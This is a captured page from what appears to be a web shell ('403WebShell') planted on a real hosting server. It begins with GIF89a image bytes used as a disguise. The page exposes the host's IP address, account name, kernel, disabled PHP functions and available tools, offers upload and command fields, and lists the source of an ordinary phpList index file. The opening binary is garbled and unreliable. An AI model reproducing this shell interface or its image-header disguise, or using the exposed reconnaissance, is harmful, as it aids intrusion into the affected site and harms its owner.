GIF89a=( ý' 7IAXKgNgYvYx\%wh&h}týh%ýs%xý}9ýRýý&ý0%ý (ý.ýý5ýSDýý&ýa)ýx5ýý;c*!&r)ï7õ<{4ý3ýH§KoTýýYýaqýýqýýFý !ý ' !ý NETSCAPE2.0 , =( ýýpH,ý$rýl:x(tJýZý,výýzýýxL.:ýýzýnýýý|Nýýýýý~ýýýýýýý& !ý0`9Rý}ýý"ý"a:Sý~xýýýýýýýýgýýýEýýýýýýýRýýýEýýýýBýý ýý8ýýDýýý"ýný ýHýýLýýDkDýBýýýýýDýýýTýýýH ýGýýA Rý |ýý m&ýýE8ýSýkGýAýpxýaýýý R2XBýýE8Iýýý6Xý:vT)ý~ýýqýåýý"F~%xý ý 4#Zý0O|-4BsýX:= Qý SalýýyXJ`G&|s hýýK3l7ýB|ý$'7J©*0!ýýDýn=ýPý ýýýý0`ýRýljýýýýv>ýýý5 ý.69ýødýýýýýnlvý9ýýf{ýýýPbx ýl5}ýpý ýýý ý3aýýýIýOýýýý!>ýýýiýý9ýý#ýý)pýa ½ ý{ý)vmýý%D~ 6fýýs}RýDýW Eý`!ý ý&L8xý ý{)x`X/>ý}mýýRý*|`Dý=ý_ ^ý5 !_&'aýOý7ýcýý`DCx`ý¥ý9ýYýFýýý`?ýý"ý ýn@`ý} lýý@4>ýd S ývýxNýý"@~dýý=ýgýs~Gýýý ýýýud &p8Qý)«lXDýýýýA~HýySunýjýýýk*DýLHý] ýýC"JýýXb~ªwSt}6K,ýýqýS:9*:ýýýlý@ý`ýý ý.ìýt9ýSý[©:ýý=`9Nýýýý{¿ýA !Rý:ýýý6ýýxý0ý_ ý;ýýýýýý^ýýý#ýýýý!ýýýýUýýý;0L1ýýýýýp% AýýU,uýý%ýSýý!ýýý~`ýGýýýý ýýý=4ýnpý3ýýýýýýýýýuýuýn|%2ýIýýrý#0ýýJ``8ý@S@5ý ýýý^`8Eý]ý.ýSýýý7 ý ý0ýj SýDý zýýýiýSýýýýý!ýýýlýýw9*ýDýIýnEXýýý &AýGoýQfýýFýý;ýýý}ýJýýýýF5ýýQ|ýýýXýýTýýyýýý]ý o ýýC=ýý:ýýýPB@ DýSý(>ýCýx}`ýýxJ,ýàýýp+eE0`ý}`A ý/NEýý ý9@ýýý Hý7ý!%B0`ýl*ýý!8 2ý%ý ý:ý1ý0Eýýux%nP1ý!ýC)ýP81lýxF#¬{ýýýýB0>ýý 403WebShell
403Webshell
Server IP : 217.18.85.50  /  Your IP : 52.15.233.83
Web Server : LiteSpeed
System : Linux server50.tr85.dhs.com.tr 3.10.0-962.3.2.lve1.5.85.el7.x86_64 #1 SMP Thu Apr 18 15:18:36 UTC 2024 x86_64
User : ferhatgenc ( )
PHP Version : 7.2.34
Disable Function : restore_ini,mail,openbasedir,f_open,system,dl,array_compare,array_user_key_compare,passthru,cat,exec,popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,ini_restore,mysql_list_dbs,getmyuid,pconnect,link,symlink,fin,passthruexec,fileread,shell_exec,pcntl_exec,ini_alter,leak,apache_child_terminate,chown,posix_kill,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,allow_url_fopen,fpassthru,execute,shell,chgrp,passthru,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,foreach,socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_version,apache_getenv,apache_note,apache_setenv,virtualal
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/softaculous/phplist/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/softaculous/phplist/_index.php
<?php

// check for basic prerequisites
require_once dirname(__FILE__).'/checkprerequisites.php';

if (ob_get_level() == 0) {
    @ob_start();
}
$er = error_reporting(0);
// check for commandline and cli version
if (!isset($_SERVER['SERVER_NAME']) && PHP_SAPI != 'cli') {
    echo 'Warning: commandline only works well with the cli version of PHP';
}

if (isset($_REQUEST['_SERVER'])) {
    exit;
}
$cline = array();
$GLOBALS['commandline'] = 0;

require_once dirname(__FILE__).'/inc/unregister_globals.php';
require_once dirname(__FILE__).'/inc/magic_quotes.php';
// Remove when php5.X is unsupported, currently 31 Dec 2018, https://secure.php.net/supported-versions.php
require_once dirname(__FILE__).'/inc/random_compat/random.php';

/* no idea why it wouldn't be there (no dependencies are mentioned on php.net/mb_strtolower), but
 * found a system missing it. We need it from the start */
if (!function_exists('mb_strtolower')) {
    function mb_strtolower($string)
    {
        return strtolower($string);
    }
}

// setup commandline
//if (php_sapi_name() == "cli") {
//# 17355 - change the way CL is detected, using the way Drupal does it.
if (!isset($_SERVER['SERVER_SOFTWARE']) && (php_sapi_name() == 'cli' || (is_numeric($_SERVER['argc']) && $_SERVER['argc'] > 0))) {
    for ($i = 0; $i < $_SERVER['argc']; ++$i) {
        $my_args = array();
        if (preg_match('/(.*)=(.*)/', $_SERVER['argv'][$i], $my_args)) {
            $_GET[$my_args[1]] = $my_args[2];
            $_REQUEST[$my_args[1]] = $my_args[2];
        }
    }
    $GLOBALS['commandline'] = 1;
    $cline = parseCline();
    $dir = dirname($_SERVER['SCRIPT_FILENAME']);
    chdir($dir);

    if (isset($cline['c']) && !is_file($cline['c'])) {
        echo "Cannot find config file\n";
        exit;
    }
} else {
    $GLOBALS['commandline'] = 0;
    header('Cache-Control: no-cache, must-revalidate');           // HTTP/1.1
    header('Pragma: no-cache');                                   // HTTP/1.0
}

$configfile = '';

if (isset($_SERVER['ConfigFile']) && is_file($_SERVER['ConfigFile'])) {
    $configfile = $_SERVER['ConfigFile'];
} elseif (isset($cline['c']) && is_file($cline['c'])) {
    $configfile = $cline['c'];
} elseif (is_file(__DIR__.'/../config/config.php')) {
    $configfile = __DIR__.'/../config/config.php';
} else {
    $configfile = '../config/config.php';
}

if (is_file($configfile) && filesize($configfile) > 20) {
    include $configfile;
} elseif ($GLOBALS['commandline']) {
    echo 'Cannot find config file'."\n";
} else {
    echo '<h3>Cannot find config file, please check permissions</h3>';
    exit;
}

$ajax = isset($_GET['ajaxed']);

if (!isset($database_host) || !isset($database_user) || !isset($database_password) || !isset($database_name)) {
    echo 'Database details incomplete, please check your config file';
    exit;
}
//exit;
// record the start time(usec) of script
$now = gettimeofday();
$GLOBALS['pagestats'] = array();
$GLOBALS['pagestats']['time_start'] = $now['sec'] * 1000000 + $now['usec'];
$GLOBALS['pagestats']['number_of_queries'] = 0;

// load all required files
require_once dirname(__FILE__).'/init.php';
require_once dirname(__FILE__).'/inc/UUID.php';
require_once dirname(__FILE__).'/'.$GLOBALS['database_module'];
include_once dirname(__FILE__).'/defaultFrontendTexts.php';
if (file_exists(dirname(__FILE__).'/../texts/'.$GLOBALS['language_module'])) {
    include_once dirname(__FILE__).'/../texts/'.$GLOBALS['language_module'];
}
include_once dirname(__FILE__).'/languages.php';
require_once dirname(__FILE__).'/defaultconfig.php';

require_once dirname(__FILE__).'/connect.php';
include_once dirname(__FILE__).'/lib.php';
require_once dirname(__FILE__).'/inc/interfacelib.php';

if (!empty($cline['-']) && $cline['-'] == 'version') {
    cl_output(ClineSignature());
    exit;
}

$systemTimer = new timer();

// do a loose check, if the token is there, it needs to be valid.
verifyCsrfGetToken(false);

if (!empty($_SESSION['hasconf']) || Sql_Table_exists($tables['config'], 1)) {
    $_SESSION['hasconf'] = true;
    //## Activate all plugins
    /* already done in pluginlib */
    //foreach ($GLOBALS['plugins'] as $plugin) {
    //$plugin->activate();
    //}
}

if (isset($_REQUEST['resettheme'])) {
    SetCookie ( 'preferredTheme','');
}

if (isset($_REQUEST['settheme']) && !empty($_REQUEST['settheme']) && is_array($THEMES[$_REQUEST['settheme']])) {
    $settheme = preg_replace('/[^\w_-]+/', '', strip_tags($_REQUEST['settheme']));
    $GLOBALS['ui'] = $_REQUEST['settheme'];
    $_SESSION['ui'] = $GLOBALS['ui'];
    SetCookie ( 'preferredTheme', $_SESSION['ui'],time()+31536000);
} elseif (!empty($_COOKIE['preferredTheme']) && isset($THEMES[$_COOKIE['preferredTheme']])) {
    $GLOBALS['ui'] = $_COOKIE['preferredTheme'];
    $_SESSION['ui'] = $GLOBALS['ui'];
}
if (isset($GLOBALS['ui']) && !is_array($THEMES[$GLOBALS['ui']])) {
    $themeKeys = array_keys($THEMES);
    $GLOBALS['ui'] = $themeKeys[0];
}
if (isset($_SESSION['ui']) && is_array($THEMES[$_SESSION['ui']])) {
    $GLOBALS['ui'] = $_SESSION['ui'];
} else {
    $_SESSION['ui'] = $GLOBALS['ui'];
}
$THEMEINFO = $THEMES[$_SESSION['ui']];

if (!empty($_GET['page']) && $_GET['page'] == 'logout' && empty($_GET['err'])) {
    foreach ($GLOBALS['plugins'] as $pluginname => $plugin) {
        $plugin->logout();
    }

    $_SESSION['adminloggedin'] = '';
    $_SESSION['logindetails'] = '';
    session_destroy();
    Redirect('home');
}

//# send a header for IE
header('X-UA-Compatible: IE=Edge');
//# tell SE's to leave us alone
header('X-Robots-Tag: noindex');

if (!$ajax && !$GLOBALS['commandline']) {
    if (USE_MINIFIED_ASSETS && file_exists(dirname(__FILE__).'/ui/'.$GLOBALS['ui'].'/pagetop_minified.php')) {
        include_once dirname(__FILE__).'/ui/'.$GLOBALS['ui'].'/pagetop_minified.php';
    } else {
        include_once dirname(__FILE__).'/ui/'.$GLOBALS['ui'].'/pagetop.php';
    }
}

if (isset($GLOBALS['pageheader'])) {
    foreach ($GLOBALS['pageheader'] as $sHeaderItem => $sHtml) {
        echo '<!--'.$sHeaderItem.'-->'.$sHtml;

        echo "\n";
    }
}

$GLOBALS['require_login'] = 0; ## this is no longer configurable and should never have been
if ($GLOBALS['commandline']) {
    cl_output(ClineSignature());
    if (!isset($_SERVER['USER']) && is_array($GLOBALS['commandline_users']) && count($GLOBALS['commandline_users'])) {
        clineError('USER environment variable is not defined, cannot do access check. Please make sure USER is defined.');
        exit;
    }
    if (is_array($GLOBALS['commandline_users']) && count($GLOBALS['commandline_users']) && !in_array($_SERVER['USER'],
            $GLOBALS['commandline_users'])
    ) {
        clineError('Sorry, You ('.$_SERVER['USER'].') do not have sufficient permissions to run phplist on commandline');
        exit;
    }
    $GLOBALS['require_login'] = 0;

    // getopt is actually useless
    //$opt = getopt("p:");

    $IsCommandlinePlugin = isset($cline['m']) && in_array($cline['m'], $GLOBALS['commandlinePlugins']);
    if ($cline['p'] && !$IsCommandlinePlugin) {
        if (empty($GLOBALS['developer_email']) && isset($cline['p']) && !in_array($cline['p'],
                $GLOBALS['commandline_pages'])
        ) {
            clineError($cline['p'].' does not process commandline');
        } elseif (isset($cline['p'])) {
            $_GET['page'] = $cline['p'];
        }
        cl_processtitle('core-'.$_GET['page']);
    } elseif ($cline['p'] && $IsCommandlinePlugin) {
        if (empty($GLOBALS['developer_email']) && isset($cline['p']) && !in_array($cline['p'],
                $commandlinePluginPages[$cline['m']])
        ) {
            clineError($cline['p'].' does not process commandline');
        } elseif (isset($cline['p'])) {
            $_GET['page'] = $cline['p'];
            $_GET['pi'] = $cline['m'];
            cl_processtitle($_GET['pi'].'-'.$_GET['page']);
        }
    } else {
        clineUsage(' [other parameters]');
        cl_output(s('Available options:'));
        @ob_end_clean();
        foreach ($GLOBALS['commandline_pages'] as $page){
            echo '     '.$page.PHP_EOL;
        }
        foreach ($GLOBALS['commandlinePluginPages'] as $plugin => $pluginPages){
            foreach ($pluginPages as $page) {
                echo '     ' . $page .' -m'.$plugin. PHP_EOL;
            }
        }
        exit;
    }
} else {
    if (CHECK_REFERRER && isset($_SERVER['HTTP_REFERER'])) {
        //# do a crude check on referrer. Won't solve everything, as it can be faked, but shouldn't hurt
        $ref = parse_url($_SERVER['HTTP_REFERER']);
        $parts = explode(':', $_SERVER['HTTP_HOST']);
        if ($ref['host'] != $parts[0] && !in_array($ref['host'], $allowed_referrers)) {
            echo 'Access denied <script type="text/javascript">document.location = document.location</script>';
            exit;
        }
    }
}

if (!isset($_GET['page'])) {
    $page = $GLOBALS['homepage'];
} else {
    $page = $_GET['page'];
}

if (preg_match("/([\w_]+)/", $page, $regs)) {
    $page = $regs[1];
} else {
    $page = '';
}
if (!is_file($page.'.php') && !isset($_GET['pi'])) {
    $page = $GLOBALS['homepage'];
}

if (!$GLOBALS['admin_auth_module']) {
    // stop login system when no admins exist
    if (!Sql_Table_Exists($tables['admin'])) {
        $GLOBALS['require_login'] = 0;
    } else {
        $num = Sql_Query("select * from {$tables['admin']}");
        if (!Sql_Affected_Rows()) {
            $msg = s('Login not available. Create an account first.');
        }
    }
} elseif (!Sql_Table_exists($GLOBALS['tables']['config'])) {
    $GLOBALS['require_login'] = 0;
}

$plugin = !empty($GLOBALS['plugins'][$_GET['pi']]) && isset($GLOBALS['plugins'][$_GET['pi']])
    ? $GLOBALS['plugins'][$_GET['pi']]
    : null;
if ($plugin) {
    $page_title = $plugin->pageTitle($page);
} else {
    $page_title = $GLOBALS['I18N']->pageTitle($page);
}

echo '<title>'.NAME.' :: ';
if (isset($GLOBALS['installation_name'])) {
    echo $GLOBALS['installation_name'].' :: ';
}
echo "$page_title</title>";
$inRemoteCall = false;
$doLoginCheck = Sql_Table_exists($tables['admin_login']);

if (!empty($GLOBALS['require_login'])) {
    //bth 7.1.2015 to support x-forwarded-for
    $remoteAddr = getClientIP();

    if ($GLOBALS['authenticationplugin']) {
        $GLOBALS['admin_auth'] = $GLOBALS['plugins'][$GLOBALS['authenticationplugin']];
    } else {
        require __DIR__.'/phpListAdminAuthentication.php';
        $GLOBALS['admin_auth'] = new phpListAdminAuthentication();
    }
    if ((!isset($_SESSION['adminloggedin']) || !$_SESSION['adminloggedin']) && isset($_REQUEST['login']) && isset($_REQUEST['password'])) {
        $loginresult = $GLOBALS['admin_auth']->validateLogin($_REQUEST['login'], $_REQUEST['password']);
        if (!$loginresult[0]) {
            $_SESSION['adminloggedin'] = '';
            $_SESSION['logindetails'] = '';
            $page = 'login';
            logEvent(sprintf($GLOBALS['I18N']->get('invalid login from %s, tried logging in as %s'), $remoteAddr,
                $_REQUEST['login']));
            $msg = $loginresult[1];
        } else {
            session_regenerate_id();
            if ($doLoginCheck) {
              # invalidate other active sessions
              Sql_Query(sprintf('update %s set active = 0 where adminid = %d and active != 0',$GLOBALS['tables']['admin_login'],$loginresult[0]));
            }

            $_SESSION['adminloggedin'] = $remoteAddr;
            $_SESSION['logindetails'] = array(
                'adminname' => $_REQUEST['login'],
                'id'        => $loginresult[0],
                'superuser' => $admin_auth->isSuperUser($loginresult[0]),
                'passhash'  => sha1($_REQUEST['password']),
            );
            //#16692 - make sure admin permissions apply at first login
            $GLOBALS['admin_auth']->validateAccount($_SESSION['logindetails']['id']);
            unset($_SESSION['session_age']);
            if (!empty($_POST['page'])) {
                $page = preg_replace('/\W+/', '', $_POST['page']);
            }

            if ($doLoginCheck) {
              # check if this is a new IP address
              $knownIP = Sql_Fetch_Row_Query(sprintf('select * from %s where remote_ip4 = "%s" and adminid = %d ',$GLOBALS['tables']['admin_login'],$remoteAddr,$loginresult[0]));
              if (empty($knownIP[0])) {
                notifyNewIPLogin($loginresult[0]);
              }
              Sql_Query(sprintf('insert into %s (moment,adminid,remote_ip4,remote_ip6,sessionid,active) 
                values(%d,%d,"%s","%s","%s",1)',
                $GLOBALS['tables']['admin_login'],time(),$loginresult[0],$remoteAddr,"",session_id()));
            }
        }
        //If passwords are encrypted and a password recovery request was made, send mail to the admin of the given email address.
    } elseif (isset($_REQUEST['forgotpassword'])) {
        $adminId = $GLOBALS['admin_auth']->adminIdForEmail($_REQUEST['forgotpassword']);
        if ($adminId) {
            $msg = sendAdminPasswordToken($adminId);
        } else {
            $msg = $GLOBALS['I18N']->get('Failed sending a change password token');
        }
        $page = 'login';
    } elseif (!empty($_GET['secret'])
        && in_array($_GET['page'], $plugin === null ? array('processbounces', 'processqueue', 'processcron') : $plugin->remotePages)) {
        //# remote processing call
        $ourSecret = getConfig('remote_processing_secret');
        if ($ourSecret != $_GET['secret']) {
            @ob_end_clean();
            echo 'Error'.': '.s('Incorrect processing secret');
            exit;
        }

        $_SESSION['adminloggedin'] = $remoteAddr;
        $_SESSION['logindetails'] = array(
            'adminname' => 'remotecall',
            'id'        => 0,
            'superuser' => 0,
            'passhash'  => 'xxxx',
        );
        $inRemoteCall = true;
    } elseif (!isset($_SESSION['adminloggedin']) || !$_SESSION['adminloggedin']) {
        //$msg = 'Not logged in';
        $logged = false;
        foreach ($GLOBALS['plugins'] as $pluginname => $plugin) {
            if ($plugin->login()) {
                $logged = true;
                break;
            }
        }
        if (!$logged) {
            $page = 'login';
        }
    } elseif (CHECK_SESSIONIP && $_SESSION['adminloggedin'] && $_SESSION['adminloggedin'] != $remoteAddr) {
        logEvent(sprintf($GLOBALS['I18N']->get('login ip invalid from %s for %s (was %s)'), $remoteAddr,
            $_SESSION['logindetails']['adminname'], $_SESSION['adminloggedin']));
        $msg = $GLOBALS['I18N']->get('Your IP address has changed. For security reasons, please login again');
        $_SESSION['adminloggedin'] = '';
        $_SESSION['logindetails'] = '';
        $page = 'login';
    } elseif ($_SESSION['adminloggedin'] && $_SESSION['logindetails']) {
        if ($doLoginCheck) {
          $active = Sql_Fetch_Row_Query(sprintf('select active from %s where adminid = %d and (remote_ip4 = "%s" or remote_ip6 = "%s") and sessionid = "%s"',
            $GLOBALS['tables']['admin_login'],$_SESSION['logindetails']['id'],$remoteAddr,"",session_id()));
        } else {
          $active = array(1); ## pretend to be active
        }
        $validate = $GLOBALS['admin_auth']->validateAccount($_SESSION['logindetails']['id']);
        if (empty($active[0]) || !$validate[0]) {
            logEvent(sprintf($GLOBALS['I18N']->get('invalidated login from %s for %s (error %s)'), $remoteAddr,
                $_SESSION['logindetails']['adminname'], $validate[1]));
            $_SESSION['adminloggedin'] = '';
            $_SESSION['logindetails'] = '';
            $page = 'login';
            if (empty($active[0])) {
              $msg = s('Your session was invalidated by a new session in a different browser');
            } else {
              $msg = $validate[1];
            }
        }
    } else {
        $page = 'login';
    }
}
if ($page == 'login') {
    unset($_GET['pi']);
}

if (!empty($_SESSION['adminloggedin']) && !empty($_SESSION['session_age']) && $_SESSION['session_age'] > SESSION_TIMEOUT) {
    $_SESSION['adminloggedin'] = '';
    $_SESSION['logindetails'] = '';
    $page = 'login';
    $msg = s('Your session timed out, please log in again');
}

//#  force to login page, if an Ajax call is made without being logged in
if ($ajax && empty($_SESSION['adminloggedin'])) {
    $_SESSION['action_result'] = s('Your session timed out, please login again');
    echo '<script type="text/javascript">top.location = "./?page=home";</script>';
    exit;
}

## add a few menu options when the admin is superuser
if (isSuperUser() && ALLOW_UPDATER) {
    $GLOBALS['pagecategories']['system']['pages'][] = 'update';
    $GLOBALS['pagecategories']['system']['menulinks'][] = 'update';
}
if (isSuperUser()) {
  foreach (array('admins','admin','importadmin','adminattributes') as $adminPage) {
    $GLOBALS['pagecategories']['config']['menulinks'][] = $adminPage;
    $GLOBALS['pagecategories']['config']['pages'][] = $adminPage;
  }
}

$languageswitcher = '';
if (LANGUAGE_SWITCH && empty($logoutontop) && !$ajax && empty($_SESSION['firstinstall']) && empty($_GET['firstinstall'])) {
    $languageswitcher = '
 <div id="languageswitcher">
       <form name="languageswitchform" method="post" action="">';
    $languageswitcher .= '
           <select name="setlanguage" onchange="document.languageswitchform.submit()">';
    $lancount = 0;
    foreach ($GLOBALS['LANGUAGES'] as $iso => $rec) {
        //  if (is_dir(dirname(__FILE__).'/locale/'.$iso)) {
        $languageswitcher .= sprintf('
                 <option value="%s" %s>%s</option>', $iso,
            $_SESSION['adminlanguage']['iso'] == $iso ? 'selected="selected"' : '', $rec[0]);
        ++$lancount;
        //  }
    }
    $languageswitcher .= '
            </select>
       </form>
 </div>';
    if ($lancount <= 1) {
        $languageswitcher = '';
    }
}

$themeswitcher = '';
if (THEME_SWITCH && empty($logoutontop) && !$ajax && empty($_SESSION['firstinstall']) && empty($_GET['firstinstall'])) {
    $themeswitcher = '
 <div id="themeswitcher">
       <form name="themeswitchform" method="post" action="">';
    $themeswitcher .= '
           <select name="settheme" onchange="document.themeswitchform.submit()">';
    $themecount = 0;
    foreach ($GLOBALS['THEMES'] as $theme => $themeData) {
        $themeswitcher .= sprintf('
                 <option value="%s" %s>%s</option>', $theme,
            $_SESSION['ui'] == $theme ? 'selected="selected"' : '', htmlspecialchars(strip_tags($themeData['name'])));
        ++$themecount;
    }
    $themeswitcher .= '
            </select>
       </form>
 </div>';
    if ($themecount <= 1) {
        $themeswitcher = '';
    }
}

require_once dirname(__FILE__).'/setpermissions.php';
$include = '';

if ($page != '' && $page != 'install') {
    preg_match("/([\w_]+)/", $page, $regs);
    $include = $regs[1];
    $include .= '.php';
    $include = $page.'.php';
} else {
    $include = $GLOBALS['homepage'].'.php';
}
$pageinfo = new pageInfo();
$pageinfo->fetchInfoContent($include);

if (is_file('ui/'.$GLOBALS['ui'].'/mainmenu.php')) {
    include 'ui/'.$GLOBALS['ui'].'/mainmenu.php';
}
if (!$ajax) {
    if (USE_MINIFIED_ASSETS && file_exists(dirname(__FILE__).'/ui/'.$GLOBALS['ui'].'/header_minified.inc')) {
        include 'ui/'.$GLOBALS['ui'].'/header_minified.inc';
    } else {
        include 'ui/'.$GLOBALS['ui'].'/header.inc';
    }
}

if (!$ajax) {
    echo '<h4 class="pagetitle">'.$page_title.'</h4>';
}
echo '<div class="hidden">'.PageLink2('home', s('Main page')).'</div>';

if ($page != 'login') {
    if ($page == 'logout') {
        $greeting = $GLOBALS['I18N']->get('goodbye');
    } else {
        $hr = date('G');
        if ($hr > 0 && $hr < 12) {
            $greeting = $GLOBALS['I18N']->get('good morning');
        } elseif ($hr <= 18) {
            $greeting = $GLOBALS['I18N']->get('good afternoon');
        } else {
            $greeting = $GLOBALS['I18N']->get('good evening');
        }
    }

    if ($page != 'logout' && empty($logoutontop) && !$ajax) {
        //  print '<div class="right">'.PageLink2("logout",$GLOBALS['I18N']->get('logout')).'</div>';
        if (!empty($_SESSION['firstinstall']) && $page != 'setup') {
            $firstInstallButton = '<div id="firstinstallbutton">'.PageLinkClass('setup', s('Continue Configuration'),
                    '', 'firstinstallbutton').'</div>';
        }
    }
}

if (!$GLOBALS['commandline']) {
    echo '<noscript>';
    Info(s('phpList will work without Javascript, but it will be easier to use if you switch it on.'));
    echo '</noscript>';
}

if (!$ajax && $page != 'login') {
    if (strpos(VERSION, 'dev') && !TEST) {
        if (!empty($GLOBALS['developer_email'])) {
            Info( s('Running DEV version. All emails will be sent to '.$GLOBALS['developer_email']) );
        } else {
            Info( s('Running DEV version, but developer email is not set') );
        }
    }
    if (TEST) {
        echo Info($GLOBALS['I18N']->get('Running in testmode, no emails will be sent. Check your config file.'));
    }

    if (ALLOW_UPDATER || $updaterplugin) {
        $updaterdir = __DIR__ . '/../updater';

        include 'updateLib.php';
        $updateNotif = checkForUpdate();

        if ($updateNotif !== '' && $_GET['page'] !== 'update') {
            $moreInfo = ' <ul><li><a href="https://www.phplist.com/download?utm_source=pl' . VERSION . '&amp;utm_medium=updatedownload&amp;utm_campaign=phpList" title="' . s('Download the new version') . '" target="_blank">' . s('Download the new version') . '</a></li>';

            if ($updaterplugin) {
                $class = get_class($updaterplugin);
                $moreInfo .= '<li>'.s('or use the %sphpList Updater%s', sprintf('<a href="?page=update&amp;pi=%s" title="', $class) . s('automatic updater') . '">','</a>');
            } elseif (file_exists($updaterdir)) {
                $moreInfo .= '<li>'.s('or use the %sphpList Updater%s','<a href="?page=update" title="' . s('automatic updater') . '">','</a>');
            }
            $moreInfo .= '</ul>';
            Info($updateNotif . '' . $moreInfo);
        }
    }

    if (version_compare(PHP_VERSION, '5.3.3', '<') && WARN_ABOUT_PHP_SETTINGS) {
        Error(s('Your PHP version is out of date. phpList requires PHP version 5.3.3 or higher.'));
    }
    if (defined('RELEASEDATE') && ((time() - RELEASEDATE) / 31536000) > 2) {
        Fatal_Error(s('Your phpList version is older than two years. Please %supgrade phpList</a> before continuing.</br>
            Visit <a href="https://www.phplist.org/users/" title="'.s('Get some help').'">the support site</a> if you need some help.'
            ,'<a href="https://www.phplist.com/download?utm_source=pl'.VERSION.'&amp;utm_medium=outdated-download-forced&amp;utm_campaign=phpList" title="'.s('Download the latest version').'" target="_blank">'));
        return;
    }

    if (defined('ENABLE_RSS') && ENABLE_RSS && !function_exists('xml_parse') && WARN_ABOUT_PHP_SETTINGS) {
        Warn($GLOBALS['I18N']->get('You are trying to use RSS, but XML is not included in your PHP'));
    }

    if (ALLOW_ATTACHMENTS && WARN_ABOUT_PHP_SETTINGS && (!is_dir($GLOBALS['attachment_repository']) || !is_writable($GLOBALS['attachment_repository']))) {
        if (ini_get('open_basedir')) {
            Warn($GLOBALS['I18N']->get('open_basedir restrictions are in effect, which may be the cause of the next warning'));
        }
        Warn($GLOBALS['I18N']->get('The attachment repository does not exist or is not writable'));
    }

    if (MANUALLY_PROCESS_QUEUE && isSuperUser() && empty($_GET['pi']) &&
        //# hmm, how many more pages to not show this?
        (!isset($_GET['page']) ||
            ($_GET['page'] != 'processqueue' && $_GET['page'] != 'messages' && $_GET['page'] != 'upgrade'))
    ) {
        //# avoid error on uninitialised DB
        if (Sql_Table_exists($tables['message'])) {
            $queued_count = Sql_Fetch_Row_Query(sprintf('select count(id) from %s where status in ("submitted","inprocess") and embargo < now()',
                $tables['message']));
            if ($queued_count[0]) {
                $link = PageLinkButton('processqueue', s('Process the queue'));
                $link2 = PageLinkButton('messages&amp;tab=active', s('View the queue'));
                if ($link || $link2) {
                    echo Info(sprintf(s('You have %s campaign(s) in the queue, ready for processing'),
                            $queued_count[0]).'<br/>'.$link.' '.$link2);
                }
            }
        }
    }
}

// always allow access to the about page
if (isset($_GET['page']) && $_GET['page'] == 'about') {
    $page = 'about';
    $include = 'about.php';
}
echo $pageinfo->show();

if (!empty($_GET['action']) && $_GET['page'] != 'pageaction' && !empty($_SESSION['adminloggedin'])) {
    $action = basename($_GET['action']);
    if (is_file(dirname(__FILE__).'/actions/'.$action.'.php')) {
        $status = '';
        //# the page action return the result in $status
        include dirname(__FILE__).'/actions/'.$action.'.php';
        echo '<div id="actionresult">'.$status.'</div>';
    }
}

/*
 *
 * show global news, based on the version in use
 *
 * **/

//if (empty($_SESSION['newsshown'])) { ## keep flag to only show one message per session
if (!empty($_SESSION['logindetails']['id']) && defined('PHPLISTNEWSROOT') && PHPLISTNEWSROOT) {
    //# for testing
    if (!empty($_GET['reset']) && $_GET['reset'] == 'news') {
        SaveConfig('readnews'.$_SESSION['logindetails']['id'], '', 0, 1);
        SaveConfig('viewednews'.$_SESSION['logindetails']['id'], '', 0, 1);
        SaveConfig('phpListNewsLastChecked-'.$_SESSION['adminlanguage']['iso'], '', 0, 1);
        SaveConfig('phpListNewsIndex-'.$_SESSION['adminlanguage']['iso'], '', 0, 1);
        clearPageCache();
    }

    $readmessagesconf = getConfig('readnews'.$_SESSION['logindetails']['id']);
    $readmessages = unserialize($readmessagesconf);
    if (!is_array($readmessages)) {
        $readmessages = array();
    }

    /* also keep track of when a message is viewed and suppress it
      if it hasn't been closed after several views */
    $viewedmessagesconf = getConfig('viewednews'.$_SESSION['logindetails']['id']);
    $viewedmessages = unserialize($viewedmessagesconf);
    if (!is_array($viewedmessages)) {
        $viewedmessages = array();
    }

    $news = array();

    // we only need it once per language per system, regardless of admins
    $phpListNewsLastChecked = getConfig('phpListNewsLastChecked-'.$_SESSION['adminlanguage']['iso']);
    if (empty($phpListNewsLastChecked) || ($phpListNewsLastChecked + 86400 < time())) {
        SaveConfig('phpListNewsLastChecked-'.$_SESSION['adminlanguage']['iso'], time(), 0, 1);
        $newsIndex = fetchUrlDirect(PHPLISTNEWSROOT.'/'.VERSION.'-'.$_SESSION['adminlanguage']['iso'].'-index.txt');
        SaveConfig('phpListNewsIndex-'.$_SESSION['adminlanguage']['iso'], $newsIndex, 0, 1);
    }
    $newsIndex = getConfig('phpListNewsIndex-'.$_SESSION['adminlanguage']['iso']);

    if (!empty($newsIndex)) {
        $newsitems = explode("\n", $newsIndex);
        foreach ($newsitems as $newsitem) {
            $newsitem = trim($newsitem);
            if (!empty($newsitem) && !in_array(md5($newsitem), $readmessages) &&
                (
                    empty($viewedmessages[md5($newsitem)]['count']) ||
                    $viewedmessages[md5($newsitem)]['count'] < 20)
            ) {
                $newscontent = fetchUrl(PHPLISTNEWSROOT.'/'.$newsitem);
                if (!empty($newscontent)) {
                    $news[$newsitem] = $newscontent;
                }
            }
        }

        ksort($news);
        $newscontent = '';
        foreach ($news as $newsitem => $newscontent) {
            $newsid = md5($newsitem);
            if (!isset($viewedmessages[$newsid])) {
                $viewedmessages[$newsid] = array(
                    'time'  => time(),
                    'count' => 1,
                );
            } else {
                ++$viewedmessages[$newsid]['count'];
            }
            SaveConfig('viewednews'.$_SESSION['logindetails']['id'], serialize($viewedmessages), 0, 1);
            $newscontent = '<div class="news"><a href="./?page=markread&id='.$newsid.'" class="ajaxable hide" title="'.s('Hide forever').'">'.s('Hide forever').'</a>'.$newscontent.'</div>';
            break;
        }
    }
    if (!empty($newscontent)) {
        $_SESSION['newsshown'] = time();
        echo '<div class="panel announcements closethisone">';
        echo '<div class="content">';
        echo $newscontent;
        echo '</div>';
        echo '</div>';
    }
}
//} // end of show one per session (not used)

/*
 *
 * end of news
 *
 * **/

if (WARN_ABOUT_PHP_SETTINGS && !$GLOBALS['commandline']) {
    if (strpos(getenv('REQUEST_URI'), $pageroot.'/admin') !== 0) {
        Warn(s(
